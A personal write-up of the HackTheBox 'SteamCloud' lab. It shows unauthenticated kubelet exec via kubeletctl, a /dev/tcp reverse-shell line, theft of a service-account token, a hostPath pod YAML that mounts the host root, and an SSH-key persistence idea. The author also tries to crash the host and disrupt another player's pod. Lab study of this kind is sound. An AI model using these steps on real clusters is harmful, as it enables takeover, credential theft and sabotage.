HackTheBox: SteamCloud

01/13/2024

This is a retired easy box that's free until mid-August.

Enumeration

Initial scan shows a LOT of ports open:


22/tcp    open  ssh
80/tcp    open  http
2379/tcp  open  etcd-client
2380/tcp  open  etcd-server
8443/tcp  open  https-alt
10249/tcp open  unknown
10250/tcp open  unknown
10256/tcp open  unknown

I suspect that the last three are dummy ports though; not technically false positives, but not relevant to this box. I've noticed that with HTB boxes before. They could actually be ports opened by other players, maybe for reverse shells or something.

Script scan of just the open ports shows the following condensed info:


80:      nginx 1.14.2
2379:    ssl/etcd-server, commonName=steamcloud
2380:    ssl/etcd-server, commonName=steamcloud
8443:    ssl/https-alt

We get a 403 error when trying to access the HTTPS page on 8443. Interestingly, two of the response headers mention Kubernetes:


X-Kubernetes-Pf-Flowschema-Uid: def40b57-6b30-44bf-8ddf-99cff7e84c4c
X-Kubernetes-Pf-Prioritylevel-Uid: 92ad2766-c55b-4df8-b9cd-8c5cf52f6354
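
(For reference, I originally spotted these in Burp, but you can also pull the response headers with a quick curl one-liner that dumps headers and discards the body:)


$ curl -sk -D - https://10.10.11.133:8443/ -o /dev/null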

Nikto finds something potentially useful about port 8443:


Hostname '10.10.11.133' does not match certificate's names: minikube.

Presumably this means that the target's hostname, or ONE of its hostnames, is "minikube." I'll add that to /etc/hosts and see if anything changes. I also went ahead and added "steamcloud" and "steamcloud.htb", since they appeared in the nmap script scan.

/etc/hosts


10.10.11.133 minikube steamcloud steamcloud.htb

Nope, no luck with either HTTP or HTTPS on 8443 using any of those three names. I'll keep nikto running in the background while I do some research on "etcd-server" to see what that's all about.

Nikto only got a false positive about a #wp-config.php file on the HTTP server. For the HTTPS server on 8443, it identified the Kubernetes headers I saw earlier as well as one more:


+ /: Uncommon header 'x-kubernetes-pf-prioritylevel-uid' found, with contents: 92ad2766-c55b-4df8-b9cd-8c5cf52f6354.
+ /: Uncommon header 'x-kubernetes-pf-flowschema-uid' found, with contents: def40b57-6b30-44bf-8ddf-99cff7e84c4c.
+ /: Uncommon header 'audit-id' found, with contents: da0a1437-bfe2-4933-9df9-a751466223d8.

If UID means what I think it does, then these are probably some kind of user IDs embedded in the response. That may or may not be useful down the line.

I'm still a complete newb to nginx, but from my own reading and also from hearing IppSec mention it, it sounds like nginx is often used just as a reverse proxy in front of another server. So I assume that means if we send the right HTTP requests, this nginx server may forward them somewhere else internal to the target and we might get a response. Not sure though.
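
One simple thing to try along those lines (just my own guess, using the hostnames found so far) is sending requests with different Host headers and checking whether the response codes differ:


$ curl -s -o /dev/null -w "%{http_code}\n" -H "Host: minikube" http://10.10.11.133/
$ curl -s -o /dev/null -w "%{http_code}\n" -H "Host: steamcloud.htb" http://10.10.11.133/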

Hold on: I don't know how the fuck this slipped by me in the first place, but the nmap script did something with DNS to resolve a hostname, and I totally ignored it. I don't know how it would've, since as far as I can tell there's no DNS gateway here. Let me go back and see what it said:

The nmap script scan also shows something else that for some reason didn't appear when I manually intercepted the request/response with Burp. It's a string in the response from port 8443 that looks interesting:


\x20cannot\x20get\x20path\x20\\\"/nice
SF:\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\"

Something about Trinity.txt.bak.

But for reference, this is all I see in Burp:


 "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
  "reason": "Forbidden",
  "details": {

So I don't know where nmap is getting the whole "Trinity.txt.bak" thing...

Okay, apparently that's just an nmap artifact. Googling trinity.txt.bak pulls up similar results: nmap's own service-detection probe requests the path "/nice ports,/Trinity.txt.bak", and the 403 message is just echoing that path back.

Back to ports 2379 and 2380: these are etcd ports. I believe 2379 is for client communication and 2380 is for server-to-server (peer) communication, and it's a Kubernetes-related service used for what sounds like data synchronization. Apparently etcd is a key-value store (almost like a database, e.g. 'key'='value'). It looks like there are Metasploit modules for scanning these ports, and from what I've seen it almost looks like they just brute-force key names to see if any values come back. But not sure...
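
As a quick sanity check before reaching for Metasploit (my own idea, not from any writeup, and it may well be refused if the server wants client certificates), etcd exposes a /version endpoint on its client port:


$ curl -k https://10.10.11.133:2379/version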

The nmap script scan identifies both etcd ports (client and server) as having commonName 'steamcloud'.

Research: What is Kubernetes?

From the sounds of it, [[Kubernetes]] is a management system for container-based applications. It helps you manage services distributed across multiple hosts, each host running one or more containers used by the application. It sounds like the point of it is to assist with scaling. One thing you can do with it is set up automated backups, for example.

It appears that Kubernetes is basically an entire framework rather than one piece of software, with its own set of jargon terms.

Even though I probably COULD just look up an article on how to pentest Kubernetes boxes, I may as well invest the time to actually learn what it's all about. It would serve me better in the long term; for one thing I might actually encounter Kubernetes in engineering, and I'm sure I'll also see it again in other boxes.

Okay. So it's a way of managing clusters of containers (which are NOT the same as virtual machines, in that each container is not running its own OS, from what I can tell).

![[Pasted image 20230724204838.png]] (That key-value store it shows is what is running on ports 2379 and 2380)

So the worker node(s) are the machines that run the actual containers, and the master node runs the control software that manages the worker nodes. Presumably the worker node and master node could be the same physical machine.

So that makes sense I guess. Now what is the key-value store?

It appears to be a relatively simple database that just associates values with key terms. Essentially it's just a 2-column database where one column is the key and the other is the value. ==I don't know if you query it for a specific value or if you just dump the entire thing?==

Kubernetes uses distributed key-value stores, which spread the store over potentially multiple machines for the sake of parallelizing operations.

It stores ALL its data in a key-value store (specifically etcd): config data, state, metadata, etc. And because Kubernetes has to manage distributed nodes, its database has to be accessible to those machines as well. Hence the 'distributed' key-value store; it runs on a server.

Okay, so now we're getting somewhere. We would expect that the key-value store will hold all the config info for the kubernetes app.

Accessing the key-value store

At this step it looks like the best option would be to try and dump the key-value store's contents. From looking online there appear to be a couple of ways of doing this. One option is to use Metasploit, which has a scanner for etcd. The other is to do it manually using the etcd client (https://etcd.io/docs/v3.4/dev-guide/interacting_v3/).
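
For reference, a minimal sketch of what the manual dump would look like with the v3 etcdctl client, assuming it were installed (and it would probably still fail here if the server requires client certificates):


$ ETCDCTL_API=3 etcdctl --insecure-skip-tls-verify \
    --endpoints=https://10.10.11.133:2379 get / --prefix --keys-only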

The second option would require installing from source, which I didn't feel like doing, and the Metasploit module didn't work either. Let me check the walkthrough quickly:

Consulting the walkthrough

Looks like I didn't do my research well enough. Turns out port 10250 is actually what should have caught my attention; it's the default port for the kubelet API (I first ran into it described in the docs for a Kubernetes management product called Rancher).

Also, port 8443 here is the Kubernetes API server; 8443 is minikube's default for it, although other services use that port too.

I should feel embarrassed about missing that; all it would have taken is a five-second Google search to figure out what it was.

The walkthrough ran the following command to dump data from port 10250:


$ curl https://10.10.11.133:10250/pods -k

(the -k flag tells curl to skip TLS certificate verification)

So obviously I didn't do my research. Anyway, that's enough of a hint. I'll go back to my own devices now.

Back on my own

So port 10250 is the kubelet's API port. From the Rancher documentation, which is where I found it described:


The port **10250** on the `kubelet` is used by the `kube-apiserver` (running on hosts labeled as **Orchestration Plane**) for exec and logs. It’s very important to lock down access to this port, only the hosts labeled as **Orchestration Plane** should be able to access `kubelet` on port **10250**.

Here's a useful hacktricks page on kubernetes that discusses port 10250: https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services

According to hacktricks,


If you can list nodes you can get a list of kubelets endpoints with:

kubectl get nodes -o custom-columns='IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port' | grep -v KUBELET_PORT | while IFS='' read -r node; do

So I have to install kubectl, which looks like a pain in the ass. I'm also out of time for today, so I'll pick it up tomorrow.

Back the next day, following the writeup

For the sake of time, and because this is my first Kubernetes box, I'm just going to use the writeup liberally. I'm also going to do this the lazy way and only do as much research as I need to, rather than researching until I feel I understand Kubernetes completely.

It may not be the "right" way to do it, but when you only have two hours or less a day, it's hard not to cut some corners.

Where we left off, we had just dumped the list of pods from the kubelet API on port 10250 with


curl -k https://10.10.11.133:10250/pods

Let's skim through this data and see what stands out.

Also, a quick note: this data is JSON, and it's much easier to read by just typing the URL into the browser and letting the browser format it.
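
Alternatively (just my own habit, not from the writeup), piping it through jq makes it readable in the terminal, e.g. to pull out just the pod names:


$ curl -sk https://10.10.11.133:10250/pods | jq '.items[].metadata.name'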

So there appear to be 10 pods listed in the dump: etcd-steamcloud, kube-apiserver-steamcloud, kube-controller-manager-steamcloud, kube-scheduler-steamcloud, 0xdf-pod, lewin, storage-provisioner, kube-proxy-9vxv7, coredns-78fcd69978-vx457, and nginx.

The writeup at this point decides to use a CLI tool called kubeletctl to interact with the system, and installs it as follows:


curl -LO https://github.com/cyberark/kubeletctl/releases/download/v1.7/kubeletctl_linux_amd64
chmod a+x ./kubeletctl_linux_amd64
mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl

This kubeletctl tool can be used to scan for pods, account tokens, RCE vulnerabilities, etc.

I used the "scan rce" option to check for RCE vulns in any of the pods, and it found that 'nginx', 'kube-proxy-9vxv7', and '0xdf-pod' were all vulnerable.

==The walkthrough singled out the nginx pod, and I'm not totally sure why.== But he decided to target that one and try to run commands on it using the kubeletctl tool's "exec" command.

==Okay, just to clarify, a POD encloses one or more CONTAINERS.==

When you use kubeletctl to run commands through RCE you need to specify both the pod and the container as well as the server.

==How exactly does RCE through pods work?==

Anyway, following the writeup, I ran "id" on the nginx pod as follows:


$ kubeletctl exec "id" -p nginx -c nginx --server 10.10.11.133

uid=0(root) gid=0(root) groups=0(root)

Nice. It's root and I have RCE. The walkthrough didn't do this, but I also checked the other containers that came up as vulnerable to RCE. The '0xdf-pod' is also running as root, but the proxy one gave me an error.

Okay, let's get a reverse shell on the nginx one, I guess. I'm still not sure why he singles that one out, but I'll roll with it for the sake of time.


kubeletctl exec "bash -i >& /dev/tcp/10.10.14.12/9001 0>&1" -p nginx -c nginx --server 10.10.11.133

No luck there (possibly because the exec API doesn't run the command string through a shell, so the redirection never gets interpreted)... and from viewing /etc/shadow in both containers, I can see there are no users besides root. I actually did find both the user and root flags by just exec'ing "find / -name root.txt" and "user.txt", but I assume that's not how you're supposed to do it.
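
Concretely, the flag hunt was just a couple of exec'd finds along these lines (I don't remember exactly which pod each flag turned up in):


$ kubeletctl exec "find / -name user.txt" -p nginx -c nginx --server 10.10.11.133
$ kubeletctl exec "find / -name root.txt" -p 0xdf-pod -c 0xdf-pod --server 10.10.11.133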

The writeup goes for priv esc by extracting the service account token and CA cert from the container, then using those creds to talk to the Kubernetes API server on port 8443. The API server will authenticate those requests as the pod's service account, and depending on that account's permissions, he'll see what he can do.

Okay. I'm pretty much just going through the motions right now. I get roughly what's going on, but I'm not sure how he knew where to look for each thing. Presumably he just has experience with Kubernetes already, or he owns a crystal ball and didn't mention it. Whatever. I'll try not to get too pissed off at this one.

Grabbing the token and SSL cert for priv esc

Like I said, I'm just following the writeup and not trying to figure it out myself.

This is basically what he did to grab the token and SSL cert, but with minor tweaks to skip a few steps:


$ kubeletctl exec "ls /var/run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx --server 10.10.11.133

ca.crt  namespace  token

$ token=`kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx --server 10.10.11.133`

$ echo $token

eyJhbGciOiJSUzI1NiIsImtpZCI6InJ6dU1LWmEzR3lheUR2ZVlBY3VSeFVlU2hnMEEzakRyUkxHLWtCSEg0eGsifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzIxODY1OTU5LCJpYXQiOjE2OTAzMjk5NTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjdlOTJiNmRjLTcxODktNDUzZS1iZGU0LWQxNTBmZjdmMTY1ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjFkYzRkMWIzLTE1YjQtNDdkOS1iMjlkLWVjMzMxZjIxY2I5ZiJ9LCJ3YXJuYWZ0ZXIiOjE2OTAzMzM1NjZ9LCJuYmYiOjE2OTAzMjk5NTksInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.dFAPdtrIDUCWzG8SbliypM2NhMty-2iO8MQsI-eodRv9ULdvJRtSYiFY0Cc3BlcKqKLeuV5KsrQDct5nmUhHJymnX1dWrlHgnnR5WLDSKwFz0acxcyjiab7ZbJNNtDW4MOOdI7xBri0mOedw1PIWO3ePxFB2xucDW4leIQHQRqj8JX3M7XrrgJ0Ib4xHYAjcCeHIOhnsl4MrO3Dpsk4lqURUSa0gZbEdWxWcAISdDx1aKpSOIedooEUUtcwxOw-Qz5zac41JdR6pRJJllf-r2HijVmk-LW_IImKVvsA3MDLFMFx_XDzx7C267qXq63V47gv1nqLq3Xh4nAzJc2uylQ

$ kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx --server 10.10.11.133 >> ca.crt


$ cat ca.crt 

-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----

Okay. Now we have to install kubectl (the official Kubernetes CLI) to use these creds against the API:


$ curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl

$ chmod +x kubectl 

$ sudo mv kubectl /usr/bin/kubectl

Okay. Now we connect to the API on port 8443 (this is verbatim from the writeup save for the IP):


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME       READY   STATUS             RESTARTS       AGE
0xdf-pod   1/1     Running            0              14h
lewin      0/1     CrashLoopBackOff   36 (48s ago)   161m
nginx      1/1     Running            0              19h

Cool. So we can see the pods. This doesn't show all of the ones that kubeletctl did; I'm guessing it only shows the default namespace, and the system ones (etcd, kube-apiserver, etc.) live in kube-system.
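
Out of curiosity, listing across every namespace would look like the following, though I didn't try it and I'd expect this service account to be denied outside its own namespace:


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods --all-namespaces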

Now he checks what permissions he has using


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list

<SNIP>
pods          []                      []               [get create list]
</SNIP>

So this user can get, create, and list pods.

Honestly, from this point on I have no idea WTF the author of the writeup is doing. He makes a new pod using the same nginx image as the existing nginx container, mounts that image in the new pod, and then reads the files in the nginx container THROUGH the new pod he created with that image mounted inside. But he doesn't explain WHY, and it makes no fucking sense to do that, since you're already root on the existing nginx container. As in, I already found the fucking flags on it.

I truly don't see the point of what this guy is doing unless it's just an exercise for the sake of learning how to do it. But since we used creds FOUND FROM THIS CONTAINER USING RCE to get this far, this step is completely fucking irrelevant...

This writeup by 0xdf is way better:

https://0xdf.gitlab.io/2022/02/14/htb-steamcloud.html

Okay, so I misunderstood what the other author was doing by creating another container. What he's actually doing is creating a container with the HOST MACHINE's system root "/" mounted inside it, NOT the "/root" dir of the nginx container. I was doubly confused. So basically he's creating another container that he can use to explore files on the machine hosting the Kubernetes cluster. He doesn't technically have control over the host though; he's just able to view its file system. I also don't know if it's a COPY of the host file system or if it's actually synchronized and he can affect it. If he can write to the host filesystem, then I guess he could potentially GET RCE in a number of ways, depending on his permissions.
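
For example (purely hypothetical on my part, and assuming the mount really is writable), one classic route from a writable host filesystem to a host shell would be dropping an SSH key into root's authorized_keys through the mount, since SSH is open on this box:


# run inside a pod that has the host / mounted at /mnt (placeholder key below)
mkdir -p /mnt/root/.ssh
echo 'ssh-ed25519 AAAA...attacker-key...' >> /mnt/root/.ssh/authorized_keys
chmod 600 /mnt/root/.ssh/authorized_keys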

I am confused though. Is it normal for the host API to just let you mount the entire system root into a container? I would assume that could only happen through a major misconfiguration, like either running the API as root or having bad permission settings...

Oh well. Let's see if I can get actual RCE on the host.

ALSO: the 0xdf-pod is NOT supposed to be there. That was probably created by another player. So you really DO have to use this method to get the root flag on this box; I just didn't realize that I wasn't supposed to be able to see that pod.

So to create a new pod you need to write a .yaml file. There's one in the 0xdf writeup, so I'll just copy+paste that.


apiVersion: v1 
kind: Pod
metadata:
  name: not-part-of-the-ctf
  namespace: default
spec:
  containers:
  - name: not-part-of-the-ctf
    image: nginx:1.14.2
    volumeMounts: 
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:  
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

(I changed the name from 0xdf-pod to "not-part-of-the-ctf" so that other players hopefully wouldn't make the same mistake)

Then create it using kubectl apply:


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f malicious_pod.yaml 

pod/not-part-of-the-ctf created

Then list pods to confirm it was created and is running:



$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods                  

NAME                  READY   STATUS             RESTARTS        AGE
0xdf-pod              1/1     Running            0               15h
lewin                 0/1     CrashLoopBackOff   47 (4m2s ago)   3h41m
nginx                 1/1     Running            0               20h
not-part-of-the-ctf   0/1     CrashLoopBackOff   2 (26s ago)     51s

Aaaand... it's not. It crashed.
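
The usual way to see why a pod is crashing would be something like the following (the logs call may not even be permitted for this service account; I didn't check):


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pod not-part-of-the-ctf -o yaml
$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 logs not-part-of-the-ctf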

I think it's because the jerkoff who copy+pasted the '0xdf-pod' verbatim from the writeup never terminated it afterwards; maybe only one pod can mount the host root at a time, or (more likely, in hindsight) with hostNetwork: true both nginx pods are fighting over port 80 on the host, so the second one can't start. Checking the 0xdf-pod's configuration using


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pod 0xdf-pod -o yaml   

I can see that he did in fact just copy+paste, so I guess I can just finish the CTF through that container. Fucking twat. I'm gonna see if I can get RCE and shut his down.

The 0xdf writeup credits one of his readers for pointing out that you CAN get a shell through kubeletctl without needing a reverse shell:


$ kubeletctl exec "/bin/bash" -p 0xdf-pod -c 0xdf-pod --server 10.10.11.133 

root@steamcloud:/# 

Beautiful. So now I have a root shell in this douchebag's pod, which presumably is hooked up to the host file system.

Got the flags. I tried to do some "extra credit" and shut down the 0xdf-pod, unsuccessfully; I ran out of time. See "After rooting" for details.

After rooting

Having to use the writeup took all the fun out of this one, and to be honest I had no real interest in learning about Kubernetes. Oh well. I guess I still learned something.

I can't pretend to take credit for beating this or anything, since I used the writeup for every part of this process.

==I am curious though: how exactly does the kubeletctl tool check for and execute RCE on a container? Read the source code, if it's available, to find out.== I don't have the source code on my system since I just installed a binary, but the project I grabbed the release from (cyberark/kubeletctl) is on GitHub, so it should be there.

I tried to shut down the other guy's pod to see if mine would work afterwards. Basically I got a root shell in his pod by just running


$ kubeletctl exec "/bin/bash" -p 0xdf-pod -c 0xdf-pod --server 10.10.11.133 

and then I navigated into the host machine's file system, which is mounted at /mnt in the pod:


root@steamcloud:/# cd /mnt
cd /mnt

root@steamcloud:/mnt# ls
ls
bin   home            lib32       media  root  sys  vmlinuz
boot  initrd.img      lib64       mnt    run   tmp  vmlinuz.old
dev   initrd.img.old  libx32      opt    sbin  usr
etc   lib             lost+found  proc   srv   var

I suspected that this file system was 'live' and not just a copy of the original. To verify this I went to /proc (really /mnt/proc, since this is the host's file system mounted at /mnt), ran ls a few times, and saw that the PID numbers were actually changing; this confirms that it IS the live file system from the host:


root@steamcloud:/mnt# cd proc
cd proc

root@steamcloud:/mnt/proc# ls
ls
1      1447  1693  26     36   617  82           interrupts    self
10     1449  17    2604   387  62   83           iomem         slabinfo
10806  1455  1733  2623   4    620  84           ioports       softirqs
11     1463  178   2662   407  63   85           irq           stat
11073  147   19    26692  452  64   86           kallsyms      swaps
11091  148   2     2680   455  65   87           kcore         sys
11349  149   20    27     456  66   9            key-users     sysrq-trigger
11367  15    2042  2706   54   67   97           keys          sysvipc
11394  150   21    2734   55   68   acpi         kmsg          thread-self
11411  151   2133  2752   56   680  buddyinfo    kpagecgroup   timer_list
11431  1517  2150  28     560  69   bus          kpagecount    tty
11554  152   22    29     561  70   cgroups      kpageflags    uptime
12     1524  2220  3      57   71   cmdline      loadavg       version
12448  1530  2238  30     578  72   consoles     locks         vmallocinfo
12464  1533  2276  30772  58   73   cpuinfo      meminfo       vmstat
12626  154   229   30791  582  74   crypto       misc          zoneinfo
12803  155   2297  31     585  75   devices      modules
13178  16    2298  31281  586  76   diskstats    mounts
13191  1612  23    32     588  77   dma          mtrr
13448  1634  2320  33     59   78   driver       net
13464  1639  24    34     591  79   execdomains  pagetypeinfo
13635  1656  2412  354    6    8    fb           partitions
[[13660]]  1672  2430  356    60   80   filesystems  sched_debug
14     1674  25    357    61   81   fs           schedstat

root@steamcloud:/mnt/proc# ls
ls
1      1447  1693  26     36   617  82           interrupts    self
10     1449  17    2604   387  62   83           iomem         slabinfo
10806  1455  1733  2623   4    620  84           ioports       softirqs
11     1463  178   2662   407  63   85           irq           stat
11073  147   19    26692  452  64   86           kallsyms      swaps
11091  148   2     2680   455  65   87           kcore         sys
11349  149   20    27     456  66   9            key-users     sysrq-trigger
11367  15    2042  2706   54   67   97           keys          sysvipc
11394  150   21    2734   55   68   acpi         kmsg          thread-self
11411  151   2133  2752   56   680  buddyinfo    kpagecgroup   timer_list
11431  1517  2150  28     560  69   bus          kpagecount    tty
11554  152   22    29     561  70   cgroups      kpageflags    uptime
12     1524  2220  3      57   71   cmdline      loadavg       version
12448  1530  2238  30     578  72   consoles     locks         vmallocinfo
12464  1533  2276  30772  58   73   cpuinfo      meminfo       vmstat
12626  154   229   30791  582  74   crypto       misc          zoneinfo
12803  155   2297  31     585  75   devices      modules
13178  16    2298  31281  586  76   diskstats    mounts
13191  1612  23    32     588  77   dma          mtrr
13448  1634  2320  33     59   78   driver       net
13464  1639  24    34     591  79   execdomains  pagetypeinfo
13635  1656  2412  354    6    8    fb           partitions
[[13661]]  1672  2430  356    60   80   filesystems  sched_debug
14     1674  25    357    61   81   fs           schedstat

Notice the PID numbers I put in brackets in the two ls runs. They're different, confirming that the file system is actually changing, which means it's live.

I tried to force the system to crash by running the following:


root@steamcloud:/mnt/proc# rm -r 1

Because PID 1 is /sbin/init, which is basically running the system:


root@steamcloud:/mnt/proc# cd 1
cd 1

root@steamcloud:/mnt/proc/1# ls
ls
attr             exe        mounts         projid_map    status
autogroup        fd         mountstats     root          syscall
auxv             fdinfo     net            sched         task
cgroup           gid_map    ns             schedstat     timers
clear_refs       io         numa_maps      sessionid     timerslack_ns
cmdline          limits     oom_adj        setgroups     uid_map
comm             loginuid   oom_score      smaps         wchan
coredump_filter  map_files  oom_score_adj  smaps_rollup
cpuset           maps       pagemap        stack
cwd              mem        patch_state    stat
environ          mountinfo  personality    statm

root@steamcloud:/mnt/proc/1# cat cmdline
/sbin/initroot